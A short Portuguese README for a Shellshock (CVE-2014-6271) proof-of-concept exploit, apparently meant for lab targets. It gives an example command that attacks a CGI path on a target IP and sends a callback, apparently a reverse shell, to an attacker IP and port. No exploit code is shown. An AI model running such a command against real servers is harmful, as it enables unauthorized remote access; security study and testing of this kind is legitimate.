
Prova de conceito para abusar da vulnerabilidade Shellshock (CVE-2014-6271).
Este exploit abusa da vulnerabilidade Shellshock (CVE-2014-6271) existente no bash a partir da versão 1.14 até a 4.3.
python3 ./exploit.py -t <target-ip:str> -u <uri:str> -a <attacker-ip:str> -p <port:int>
Exemplo:
python3 ./exploit.py -t 10.10.10.15 -u /cgi-bin/vulnerable -a 10.10.10.7 -p 4443
Mais informações sobre a vulnerabilidade:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-6271